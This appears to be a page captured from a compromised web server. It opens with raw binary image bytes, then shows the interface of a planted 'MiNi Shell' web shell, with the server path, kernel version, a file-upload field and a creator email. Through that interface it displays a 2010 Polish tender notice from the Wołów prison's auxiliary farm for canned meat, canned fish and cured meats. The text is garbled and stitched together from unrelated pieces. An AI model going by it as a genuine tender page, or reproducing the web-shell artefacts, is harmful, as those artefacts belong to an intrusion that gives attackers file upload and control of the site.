JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100826/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100826/231903-N-2010.html

<p class="kh_header"><b>Wołów: Sukcesywna dostawa konserw mięsnych, konserw rybnych i wędlin</b><br>
<b>Numer ogłoszenia: 231903 - 2010; data zamieszczenia: 26.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze Zakład Produkcyjny przy Zakładzie Karnym w Wołowie , ul. Więzienna 6, 56-100 Wołów, woj. dolnośląskie, tel. 071 3891116, faks 071 3891117.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot Sektora Finansów Publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa konserw mięsnych, konserw rybnych i wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr I - Dostawy konserw mięsnych i konserw rybnych:
Gulasz Angielski Krakus puszka z otwier. 300g  2000 szt, Gulasz Angielski Pamapol puszka z otwier. 300g 1500 szt, Golonka Konserwowa Krakus puszka z otwier.300g 1700 szt,
Konserwa Turystyczna Pamapol puszka z otwier. 300g 800 szt, Konserwa Tyrolska Pamapol puszka z otwier. 300g 500 szt, Boczek mielony Agrico, alu-pack 156g 8000 szt, Boczek mielony Agrico, Alu-pack 300g 600szt, Golonka mielona Agrico, alu-pac 156g 700 szt, Golonka mielona Agrico, alu-pac 300g 600 szt, Konserwa Turystyczna, alu-pac 300g 2000 szt, Konserwa Tyrolska, alu-pac 300g 1500 szt, Przysmak Śniadaniowy Agrico, alu-pak 300g  7000 szt,  Smalec z mięsem Agrico, alu-pack 156g 2000 szt, Smalec z mięsem Agrico, alu-pack 300g 3600 szt, Szynka Indyk owal Profi, alu-pack 110g 3000 szt, Szynka polska Agrico, alu-pack 120g  1000 szt, Szynka mielona Agrico, alu-pak 300g 800 szt, Szynka Polska Agrico, alu-pack 110g  600 szt, Wielkopolski pasztet z drob. różne sm.Profi alu-pack 131g 10000 szt, Wieprzowina do smarowania Agrico, alu-pac 300g 1500 szt, Pasztet Prochowicki puszka z otwier.160g 2500 szt, Paprykarz Szczeciński Dega, alu-pak 135g 2000 szt, Paprykarz z łososia Dega, alu-pak 135g 700 szt, Pasztet z łososia Dega, alu-pak 135g  700 szt, Sałatka pikantna z makrel Dega, alu-pac 135g  2000 szt, Sałatka rybna Neptun Dega, alu-pac 135g 1200 szt, Sałatka rybna z warzywami Dega, alu-pac 135g 800 szt, Sałatka z tuńczykiem Dega, alu-pac 135g 16000 szt,  Byczki w pomidorach EvraFish, puszka z otwier. 300g 300 szt, Filet z makreli w oleju EvraFish, puszka z otwier. 170g 300 szt, Filet z makreli w pom. EvraFish, puszka z otwier. 170g  300 szt, Filet ze śledzia w oleju EvraFish, puszka z otwier. 170g 250 szt, Filet ze śledzia w pom. EvraFish, puszka z otwier. 170g 500 szt Makrela w pomidorach EvraFish, puszka z otwier. 300g 300 szt, Paprykarz Szczeciński Dega, puszka z otwier. 300g 300 szt, Szprot w oleju EvraFish, puszka z otwier. 170g 300 szt, Szprot w pomidorach EvraFish, puszka z otwier. 170g 300 szt, Tuńczyk kawałki w oleju EvraFish, puszka z otwier. 170g 1600 szt, Tuńczyk kaw. w sosie włas. Evrafish, puszka z otwier. 170g 1600 szt.


Zadanie nr II -  dostawy wędlin
Kiełbasa Codzienna Tarczyński 1000 kg,  Kiełbasa Senatorska Tarczyński 400 kg, Kiełbasa Śląska Tarczyński 500 kg, Kiełbasa Żywiecka Tarczyński 300 kg, Kiełbasa Jałowcowa Tarczyński 80 kg, 
Parówki wieprzowe cienkie Tarczyński 160 kg, Udka wędzone Tarczyński 180 kg, Boczek wędzony parzony paski Tarczyński 720 kg, Szynka wieprzowa gotowana Tarczyński 200 kg, Salceson drobiowy Tarczyński 30 kg, Kiełbasa Swojska Tarczyński 300 kg, Kiełbasa Krakowska Sucha Tarczyński 150 kg, Kabanosy wieprzowe Tarczyński 80 kg, Szynka gotowana plastry Tarczyński 100g 100 szt, 
Baleron gotowany plastry Tarczyński 100g 100 szt, Boczek Zbójnicki plastry Tarczyński 100g 100 szt,
Kiełb. Krak. Sucha wieprz. Tarczyński plastry 100g 100 szt, Salceson czarny plastry Tarczyński 100g 30 szt, Polędwica Sopocka plastry Tarczyński 100g 100 szt, Szynka kons. wieprzowa plastry Tarczyński 100g 100 szt, Szynka kons. z indyka plastry Tarczyński 100g 100szt, Kiełbasa Szynkowa plastry Tarczyński 100g 50 szt, Salami plastry Tarczyński 100g 50 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.20.00.00-0, 15.13.11.30-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy o spełnieniu warunków udziału w postepowaniu, o których mowa w art.22 ust. 1 ustawy PZP.  Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie oświadczeń i dokumentów, wg formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.prosport.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gospodarstwo Pomocnicze Zakład Produkcyjny przy Zakładzie Karnym w Wołowie 
ul Więzienna 6, 56-100 Wołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2010 godzina 10:00, miejsce: Gospodarstwo Pomocnicze Zakład Produkcyjny przy Zakładzie Karnym w Wołowie 
ul Więzienna 6, 56-100 Wołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy konserw mięsnych i konserw rybnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr I - Dostawy konserw mięsnych i konserw rybnych:
Gulasz Angielski Krakus puszka z otwier. 300g  2000 szt, Gulasz Angielski Pamapol puszka z otwier. 300g 1500 szt, Golonka Konserwowa Krakus puszka z otwier.300g 1700 szt,
Konserwa Turystyczna Pamapol puszka z otwier. 300g 800 szt, Konserwa Tyrolska Pamapol puszka z otwier. 300g 500 szt, Boczek mielony Agrico, alu-pack 156g 8000 szt, Boczek mielony Agrico, Alu-pack 300g 600szt, Golonka mielona Agrico, alu-pac 156g 700 szt, Golonka mielona Agrico, alu-pac 300g 600 szt, Konserwa Turystyczna, alu-pac 300g 2000 szt, Konserwa Tyrolska, alu-pac 300g 1500 szt, Przysmak Śniadaniowy Agrico, alu-pak 300g  7000 szt,  Smalec z mięsem Agrico, alu-pack 156g 2000 szt, Smalec z mięsem Agrico, alu-pack 300g 3600 szt, Szynka Indyk owal Profi, alu-pack 110g 3000 szt, Szynka polska Agrico, alu-pack 120g  1000 szt, Szynka mielona Agrico, alu-pak 300g 800 szt, Szynka Polska Agrico, alu-pack 110g  600 szt, Wielkopolski pasztet z drob. różne sm.Profi alu-pack 131g 10000 szt, Wieprzowina do smarowania Agrico, alu-pac 300g 1500 szt, Pasztet Prochowicki puszka z otwier.160g 2500 szt, Paprykarz Szczeciński Dega, alu-pak 135g 2000 szt, Paprykarz z łososia Dega, alu-pak 135g 700 szt, Pasztet z łososia Dega, alu-pak 135g  700 szt, Sałatka pikantna z makrel Dega, alu-pac 135g  2000 szt, Sałatka rybna Neptun Dega, alu-pac 135g 1200 szt, Sałatka rybna z warzywami Dega, alu-pac 135g 800 szt, Sałatka z tuńczykiem Dega, alu-pac 135g 16000 szt,  Byczki w pomidorach EvraFish, puszka z otwier. 300g 300 szt, Filet z makreli w oleju EvraFish, puszka z otwier. 170g 300 szt, Filet z makreli w pom. EvraFish, puszka z otwier. 170g  300 szt, Filet ze śledzia w oleju EvraFish, puszka z otwier. 170g 250 szt, Filet ze śledzia w pom. EvraFish, puszka z otwier. 170g 500 szt Makrela w pomidorach EvraFish, puszka z otwier. 300g 300 szt, Paprykarz Szczeciński Dega, puszka z otwier. 300g 300 szt, Szprot w oleju EvraFish, puszka z otwier. 170g 300 szt, Szprot w pomidorach EvraFish, puszka z otwier. 170g 300 szt, Tuńczyk kawałki w oleju EvraFish, puszka z otwier. 170g 1600 szt, Tuńczyk kaw. w sosie włas. Evrafish, puszka z otwier. 170g 1600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr II -  dostawy wędlin
Kiełbasa Codzienna Tarczyński 1000 kg,  Kiełbasa Senatorska Tarczyński 400 kg, Kiełbasa Śląska Tarczyński 500 kg, Kiełbasa Żywiecka Tarczyński 300 kg, Kiełbasa Jałowcowa Tarczyński 80 kg, 
Parówki wieprzowe cienkie Tarczyński 160 kg, Udka wędzone Tarczyński 180 kg, Boczek wędzony parzony paski Tarczyński 720 kg, Szynka wieprzowa gotowana Tarczyński 200 kg, Salceson drobiowy Tarczyński 30 kg, Kiełbasa Swojska Tarczyński 300 kg, Kiełbasa Krakowska Sucha Tarczyński 150 kg, Kabanosy wieprzowe Tarczyński 80 kg, Szynka gotowana plastry Tarczyński 100g 100 szt, 
Baleron gotowany plastry Tarczyński 100g 100 szt, Boczek Zbójnicki plastry Tarczyński 100g 100 szt,
Kiełb. Krak. Sucha wieprz. Tarczyński plastry 100g 100 szt, Salceson czarny plastry Tarczyński 100g 30 szt, Polędwica Sopocka plastry Tarczyński 100g 100 szt, Szynka kons. wieprzowa plastry Tarczyński 100g 100 szt, Szynka kons. z indyka plastry Tarczyński 100g 100szt, Kiełbasa Szynkowa plastry Tarczyński 100g 50 szt, Salami plastry Tarczyński 100g 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com